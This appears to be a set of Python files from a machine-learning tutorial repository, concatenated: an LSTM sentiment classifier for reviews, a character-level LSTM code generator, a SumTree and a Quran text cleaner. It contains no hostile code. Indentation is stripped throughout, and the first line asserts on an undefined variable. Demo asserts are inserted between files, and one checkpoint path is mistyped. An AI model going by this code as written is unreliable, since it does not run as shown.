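assert _np_demo.allclose(_demo_Q, [[3.0, 1.0, 2.0]])   # mean advantage is 0 here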
import numpy
class SumTree:
write = 0
def __init__(self, capacity):
self.capacity = capacity
self.tree = numpy.zeros( 2*capacity - 1 )
self.data = numpy.zeros( capacity, dtype=object )
def _propagate(self, idx, change):
parent = (idx - 1) // 2
self.tree[parent] += change
if parent != 0:
self._propagate(parent, change)
def _retrieve(self, idx, s):
left = 2 * idx + 1
right = left + 1
if left >= len(self.tree):
return idx
if s <= self.tree[left]:
return self._retrieve(left, s)
else:
return self._retrieve(right, s-self.tree[left])
def total(self):
return self.tree[0]
def add(self, p, data):
idx = self.write + self.capacity - 1
self.data[self.write] = data
self.update(idx, p)
self.write += 1
if self.write >= self.capacity:
self.write = 0
def update(self, idx, p):
change = p - self.tree[idx]
self.tree[idx] = p
self._propagate(idx, change)
def get(self, s):
idx = self._retrieve(0, s)
dataIdx = idx - self.capacity + 1
return (idx, self.tree[idx], self.data[dataIdx])
import numpy as np
from string import punctuation
from collections import Counter
from sklearn.model_selection import train_test_split
with open("data/reviews.txt") as f:
reviews = f.read()
with open("data/labels.txt") as f:
labels = f.read()
# remove all punctuations
all_text = ''.join([ c for c in reviews if c not in punctuation ])
reviews = all_text.split("\n")
reviews = [ review.strip() for review in reviews ]
all_text = ' '.join(reviews)
words = all_text.split()
print("Total words:", len(words))
# encoding the words
# dictionary that maps vocab words to integers here
vocab = sorted(set(words))
print("Unique words:", len(vocab))
# start is 1 because 0 is encoded for blank
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# encoded reviews
encoded_reviews = []
for review in reviews:
encoded_reviews.append([vocab2int[word] for word in review.split()])
encoded_reviews = np.array(encoded_reviews)
# print("Number of reviews:", len(encoded_reviews))
# encode the labels, 1 for 'positive' and 0 for 'negative'
labels = labels.split("\n")
labels = [1 if label == 'positive' else 0 for label in labels]
# print("Number of labels:", len(labels))
review_lens = [len(x) for x in encoded_reviews]
counter_reviews_lens = Counter(review_lens)
# remove any reviews with 0 length
cleaned_encoded_reviews, cleaned_labels = [], []
for review, label in zip(encoded_reviews, labels):
if len(review) != 0:
cleaned_encoded_reviews.append(review)
cleaned_labels.append(label)
encoded_reviews = np.array(cleaned_encoded_reviews)
labels = cleaned_labels
# print("Number of reviews:", len(encoded_reviews))
# print("Number of labels:", len(labels))
sequence_length = 200
features = np.zeros((len(encoded_reviews), sequence_length), dtype=int)
for i, review in enumerate(encoded_reviews):
features[i, -len(review):] = review[:sequence_length]
# print(features[:10, :100])
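# --- illustration (not part of the original code): the loop above left-pads short
# reviews with zeros and keeps only the first sequence_length tokens of long ones.
_demo_row = np.zeros((1, 5), dtype=int)            # pretend sequence_length = 5
_demo_review = [7, 8, 9]                           # an encoded review of length 3
_demo_row[0, -len(_demo_review):] = _demo_review[:5]
assert _demo_row.tolist() == [[0, 0, 7, 8, 9]]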
# split data into train, validation and test
split_frac = 0.9
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=1-split_frac)
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.5)
print(f"""Features shapes:
Train set: {X_train.shape}
Validation set: {X_validation.shape}
Test set: {X_test.shape}""")
print("Example:")
print(X_train[0])
print(y_train[0])
# X_train, X_validation = features[:split_frac*len(features)], features[split_frac*len(features):]
# y_train, y_validation = labels[:split]
import tensorflow as tf
from utils import get_batches
from train import *
import tensorflow as tf
from preprocess import vocab2int, X_train, y_train, X_validation, y_validation, X_test, y_test
from utils import get_batches
import numpy as np
def get_lstm_cell():
# basic LSTM cell
lstm = tf.contrib.rnn.BasicLSTMCell(lstm_size)
# dropout to the cell
drop = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop
# RNN paramaters
lstm_size = 256
lstm_layers = 1
batch_size = 256
learning_rate = 0.001
n_words = len(vocab2int) + 1 # Added 1 for the 0 that is for padding
# create the graph object
graph = tf.Graph()
# add nodes to the graph
with graph.as_default():
inputs = tf.placeholder(tf.int32, (None, None), "inputs")
labels = tf.placeholder(tf.int32, (None, None), "labels")
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
# number of units in the embedding layer
embedding_size = 300
with graph.as_default():
# embedding lookup matrix
embedding = tf.Variable(tf.random_uniform((n_words, embedding_size), -1, 1))
# pass to the LSTM cells
embed = tf.nn.embedding_lookup(embedding, inputs)
# stackup multiple LSTM layers
cell = tf.contrib.rnn.MultiRNNCell([get_lstm_cell() for i in range(lstm_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
# pass cell and input to cell, returns outputs for each time step
# and the final state of the hidden layer
# run the data through the rnn nodes
outputs, final_state = tf.nn.dynamic_rnn(cell, embed, initial_state=initial_state)
# grab the last output
# use sigmoid for binary classification
predictions = tf.contrib.layers.fully_connected(outputs[:, -1], 1, activation_fn=tf.sigmoid)
# calculate cost using MSE
cost = tf.losses.mean_squared_error(labels, predictions)
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
# nodes to calculate the accuracy
correct_pred = tf.equal(tf.cast(tf.round(predictions), tf.int32), labels)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
saver = tf.train.Saver()
########### training ##########
epochs = 10
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
iteration = 1
for e in range(epochs):
state = sess.run(initial_state)
for i, (x, y) in enumerate(get_batches(X_train, y_train, batch_size=batch_size)):
y = np.array(y)
x = np.array(x)
feed = {inputs: x, labels: y[:, None],
keep_prob: 0.5,
initial_state: state}
loss, state, _ = sess.run([cost, final_state, optimizer], feed_dict=feed)
if iteration % 5 == 0:
print(f"[Epoch: {e}/{epochs}] Iteration: {iteration} Train loss: {loss:.3f}")
if iteration % 25 == 0:
val_acc = []
val_state = sess.run(cell.zero_state(batch_size, tf.float32))
for x, y in get_batches(X_validation, y_validation, batch_size=batch_size):
x, y = np.array(x), np.array(y)
feed = {inputs: x, labels: y[:, None],
keep_prob: 1, initial_state: val_state}
batch_acc, val_state = sess.run([accuracy, final_state], feed_dict=feed)
val_acc.append(batch_acc)
print(f"val_acc: {np.mean(val_acc):.3f}")
iteration += 1
saver.save(sess, "chechpoints/sentiment1.ckpt")
test_acc = []
with tf.Session(graph=graph) as sess:
saver = tf.train.Saver()
saver.restore(sess, tf.train.latest_checkpoint('checkpoints'))
test_state = sess.run(cell.zero_state(batch_size, tf.float32))
for ii, (x, y) in enumerate(get_batches(X_test, y_test, batch_size), 1):
feed = {inputs: x,
labels: y[:, None],
keep_prob: 1,
initial_state: test_state}
batch_acc, test_state = sess.run([accuracy, final_state], feed_dict=feed)
test_acc.append(batch_acc)
print("Test accuracy: {:.3f}".format(np.mean(test_acc)))
def get_batches(x, y, batch_size=100):
n_batches = len(x) // batch_size
x, y = x[:n_batches*batch_size], y[:n_batches*batch_size]
for i in range(0, len(x), batch_size):
yield x[i: i+batch_size], y[i: i+batch_size]
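# --- illustration (not part of the original code): get_batches drops the remainder that
# does not fill a whole batch and yields aligned (x, y) slices.
_demo_batches = list(get_batches(list(range(10)), list(range(10, 20)), batch_size=4))
# 10 samples with batch_size=4 -> 2 full batches, the last 2 samples are dropped
assert len(_demo_batches) == 2 and _demo_batches[0][0] == [0, 1, 2, 3]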
import numpy as np
import pandas as pd
import tqdm
from string import punctuation
punc = set(punctuation)
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
X = np.zeros((len(df), 2), dtype=object)
for i in tqdm.tqdm(range(len(df)), "Cleaning X"):
target = df['Text'].loc[i]
# X.append(''.join([ c.lower() for c in target if c not in punc ]))
X[i, 0] = ''.join([ c.lower() for c in target if c not in punc ])
X[i, 1] = df['Score'].loc[i]
pd.DataFrame(X, columns=["Text", "Score"]).to_csv("data/Reviews.csv")
### Model Architecture hyper parameters
embedding_size = 64
# sequence_length = 500
sequence_length = 42
LSTM_units = 128
### Training parameters
batch_size = 128
epochs = 20
### Preprocessing parameters
# words that occur less than n times to be deleted from dataset
N = 10
# test size in ratio, train size is 1 - test_size
test_size = 0.15
from keras.models import Sequential
from keras.layers import Embedding, LSTM, Dense, Activation, LeakyReLU, Dropout, TimeDistributed
from keras.layers import SpatialDropout1D
from config import LSTM_units
def get_model_binary(vocab_size, sequence_length):
embedding_size = 64
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation='sigmoid'))
model.summary()
return model
def get_model_5stars(vocab_size, sequence_length, embedding_size, verbose=0):
model=Sequential()
model.add(Embedding(vocab_size, embedding_size, input_length=sequence_length))
model.add(SpatialDropout1D(0.15))
model.add(LSTM(LSTM_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(1, activation="linear"))
if verbose:
model.summary()
return model
import numpy as np
import pandas as pd
import tqdm
import pickle
from collections import Counter
from sklearn.model_selection import train_test_split
from utils import clean_text, tokenize_words
from config import N, test_size
def load_review_data():
# df = pd.read_csv("data/Reviews.csv")
df = pd.read_csv(r"E:\datasets\sentiment\food_reviews\amazon-fine-food-reviews\Reviews.csv")
# preview
print(df.head())
print(df.tail())
vocab = []
# X = np.zeros((len(df)*2, 2), dtype=object)
X = np.zeros((len(df), 2), dtype=object)
# for i in tqdm.tqdm(range(len(df)), "Cleaning X1"):
# target = df['Text'].loc[i]
# score = df['Score'].loc[i]
# X[i, 0] = clean_text(target)
# X[i, 1] = score
# for word in X[i, 0].split():
# vocab.append(word)
# k = i+1
k = 0
for i in tqdm.tqdm(range(len(df)), "Cleaning X2"):
target = df['Summary'].loc[i]
score = df['Score'].loc[i]
X[i+k, 0] = clean_text(target)
X[i+k, 1] = score
for word in X[i+k, 0].split():
vocab.append(word)
# vocab = set(vocab)
vocab = Counter(vocab)
# delete words that occur less than 10 times
vocab = { k:v for k, v in vocab.items() if v >= N }
# word to integer encoder dict
vocab2int = {word: i for i, word in enumerate(vocab, start=1)}
# pickle int2vocab for testing
print("Pickling vocab2int...")
pickle.dump(vocab2int, open("data/vocab2int.pickle", "wb"))
# encoded reviews
for i in tqdm.tqdm(range(X.shape[0]), "Tokenizing words"):
X[i, 0] = tokenize_words(str(X[i, 0]), vocab2int)
lengths = [ len(row) for row in X[:, 0] ]
print("min_length:", min(lengths))
print("max_length:", max(lengths))
X_train, X_test, y_train, y_test = train_test_split(X[:, 0], X[:, 1], test_size=test_size, shuffle=True, random_state=19)
return X_train, X_test, y_train, y_test, vocab
import os
# disable keras loggings
import sys
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import keras
sys.stderr = stderr
# to use CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from model import get_model_5stars
from utils import clean_text, tokenize_words
from config import embedding_size, sequence_length
from keras.preprocessing.sequence import pad_sequences
import pickle
vocab2int = pickle.load(open("data/vocab2int.pickle", "rb"))
model = get_model_5stars(len(vocab2int), sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V20_0.38_0.80.h5")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Food Review evaluator")
parser.add_argument("review", type=str, help="The review of the product in text")
args = parser.parse_args()
review = tokenize_words(clean_text(args.review), vocab2int)
x = pad_sequences([review], maxlen=sequence_length)
print(f"{model.predict(x)[0][0]:.2f}/5")
# to use CPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import os
import numpy as np
import pandas as pd
from keras.callbacks import ModelCheckpoint
from keras.preprocessing import sequence
from preprocess import load_review_data
from model import get_model_5stars
from config import sequence_length, embedding_size, batch_size, epochs
X_train, X_test, y_train, y_test, vocab = load_review_data()
vocab_size = len(vocab)
print("Vocab size:", vocab_size)
X_train = sequence.pad_sequences(X_train, maxlen=sequence_length)
X_test = sequence.pad_sequences(X_test, maxlen=sequence_length)
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
model = get_model_5stars(vocab_size, sequence_length=sequence_length, embedding_size=embedding_size)
model.load_weights("results/model_V40_0.60_0.67.h5")
model.compile(loss="mse", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpointer = ModelCheckpoint("results/model_V40_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=True, verbose=1)
model.fit(X_train, y_train, epochs=epochs,
validation_data=(X_test, y_test),
batch_size=batch_size,
callbacks=[checkpointer])
import numpy as np
from string import punctuation
# make it a set to accelerate tests
punc = set(punctuation)
def clean_text(text):
return ''.join([ c.lower() for c in str(text) if c not in punc ])
def tokenize_words(words, vocab2int):
words = words.split()
tokenized_words = np.zeros((len(words),))
for j in range(len(words)):
try:
tokenized_words[j] = vocab2int[words[j]]
except KeyError:
# didn't add any unk, just ignore
pass
return tokenized_words
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
seed = "import os"
# output:
# ded of and alice as it go on and the court
# well you wont you wouldncopy thing
# there was not a long to growing anxiously any only a low every cant
# go on a litter which was proves of any only here and the things and the mort meding and the mort and alice was the things said to herself i cant remeran as if i can repeat eften to alice any of great offf its archive of and alice and a cancur as the mo
char2int = pickle.load(open("python-char2int.pickle", "rb"))
int2char = pickle.load(open("python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(400), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import numpy as np
import os
import pickle
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout
from keras.callbacks import ModelCheckpoint
from utils import get_batches
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
from string import punctuation
# read the data
# text = open("data/wonderland.txt", encoding="utf-8").read()
text = open("E:\\datasets\\text\\my_python_code.py").read()
# remove caps
text = text.lower()
for c in "!":
text = text.replace(c, "")
# text = text.lower().replace("\n\n", "\n").replace("", "").replace("", "").replace("", "").replace("", "")
# text = text.translate(str.maketrans("", "", punctuation))
# text = text[:100_000]
n_chars = len(text)
unique_chars = ''.join(sorted(set(text)))
print("unique_chars:", unique_chars)
n_unique_chars = len(unique_chars)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(unique_chars)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(unique_chars)}
# save these dictionaries for later generation
pickle.dump(char2int, open("python-char2int.pickle", "wb"))
pickle.dump(int2char, open("python-int2char.pickle", "wb"))
# hyper parameters
sequence_length = 100
step = 1
batch_size = 128
epochs = 1
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length, step):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
X = get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps=step)
# for i, x in enumerate(X):
# if i == 1:
# break
# print(x[0].shape, x[1].shape)
# # vectorization
# X = np.zeros((len(sentences), sequence_length, n_unique_chars))
# y = np.zeros((len(sentences), n_unique_chars))
# for i, sentence in enumerate(sentences):
# for t, char in enumerate(sentence):
# X[i, t, char2int[char]] = 1
# y[i, char2int[y_train[i]]] = 1
# X = np.array([char2int[c] for c in text])
# print("X.shape:", X.shape)
# goal of X is (n_samples, sequence_length, n_chars)
# sentences = np.zeros(())
# print("y.shape:", y.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
model.load_weights("results/python-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/python-v2-{loss:.2f}.h5", verbose=1)
# model.fit(X, y, batch_size=batch_size, epochs=epochs, callbacks=[checkpoint])
model.fit_generator(X, steps_per_epoch=len(sentences) // batch_size, epochs=epochs, callbacks=[checkpoint])
import numpy as np
def get_batches(sentences, y_train, char2int, batch_size, sequence_length, n_unique_chars, n_steps):
chars_per_batch = batch_size * n_steps
n_batches = len(sentences) // chars_per_batch
while True:
for i in range(0, len(sentences), batch_size):
X = np.zeros((batch_size, sequence_length, n_unique_chars))
y = np.zeros((batch_size, n_unique_chars))
for j, sentence in enumerate(sentences[i: i+batch_size]):  # use j so the outer loop index i is not shadowed
for t, char in enumerate(sentence):
X[j, t, char2int[char]] = 1
y[j, char2int[y_train[i + j]]] = 1
yield X, y
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
to_be_removed = unique_chars - arabic_alpha
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
text = text.replace("", ".")
for char in to_be_removed:
text = text.replace(char, "")
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
batch_normalization=True, bidirectional=True)
params = {
"units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
# if bidirectional:
# model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
# else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if i == num_layers - 1:
return_sequences = False
else:
return_sequences = True
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=return_sequences)))
else:
model.add(cell(units, return_sequences=return_sequences))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(output_dim, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
return model
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
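# --- illustration (not part of the original code): pick_top_n zeroes everything except
# the top_n probabilities, renormalises, and samples from what is left, so with top_n=2
# only the two most likely characters can ever be drawn.
_demo_preds = np.array([[0.05, 0.6, 0.3, 0.05]])
assert pick_top_n(_demo_preds, vocab_size=4, top_n=2) in (1, 2)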
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return int2char[np.argmax(logits, axis=0)]
# return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
new_chars = ""
for i in range(n_chars):
x = np.array(text_to_sequence(initial_text))
x, _ = get_data(x, 64, n_steps, 1)
pred = model.predict(x)[0][0]
c = logits_to_text(pred)
new_chars += c
initial_text += c
return new_chars
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
for i, t in enumerate(train):
if i == 2:
break
print(t[0])
print(np.array(t[0]).shape)
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
# os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
# epochs=30,
# validation_data=(test),
# steps_per_epoch=train_steps_per_epoch,
# validation_steps=test_steps_per_epoch,
# callbacks=[checkpointer],
# verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
int2char, char2int = None, None
def read_data(load=False):
global int2char
global char2int
with open("E:\\datasets\\text\\my_python_code.py") as f:
text = f.read()
unique_chars = set(text)
if not load:
int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
pickle.dump(int2char, open("results/int2char.pickle", "wb"))
pickle.dump(char2int, open("results/char2int.pickle", "wb"))
else:
int2char = pickle.load(open("results/int2char.pickle", "rb"))
char2int = pickle.load(open("results/char2int.pickle", "rb"))
return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
if output_format == "many":
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
elif output_format == "one":
while True:
# X = np.zeros((arr.shape[1], n_steps))
# y = np.zeros((arr.shape[1], 1))
# for i in range(n_samples-n_steps):
# X[i] = np.array([ p.replace(",", "") if isinstance(p, str) else p for p in df.Price.iloc[i: i+n_steps] ])
# price = df.Price.iloc[i + n_steps]
# y[i] = price.replace(",", "") if isinstance(price, str) else price
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
y = np.expand_dims(y, axis=0)
yield x.reshape(1, x.shape[0], x.shape[1]), y
def get_data(arr, batch_size, n_steps, vocab_size):
# n_samples = len(arr) // n_seq
# X = np.zeros((n_seq, n_samples))
# Y = np.zeros((n_seq, n_samples))
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
# for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
# x = arr[i:i+n_seq]
# y = arr[i+1:i+n_seq+1]
# if len(x) != n_seq or len(y) != n_seq:
# break
# X[:, index] = x
# Y[:, index] = y
X = np.zeros((batch_size, arr.shape[1]))
Y = np.zeros((batch_size, vocab_size))
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
# y = np.expand_dims(y, axis=1)
X[:, n: n+n_steps] = x
Y[n] = y
# yield x.reshape(1, x.shape[0], x.shape[1]), y
return np.expand_dims(X, axis=1), Y
# return n_samples
# return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
if output_format == "many":
return len(arr) // n_seq
elif output_format == "one":
return len(arr) - n_seq
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def sequence_to_text(sequence):
global int2char
return ''.join([ int2char[i] for i in sequence ])
import json
import os
import glob
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
filename = os.path.join(CUR_DIR, "data", "json", filename)
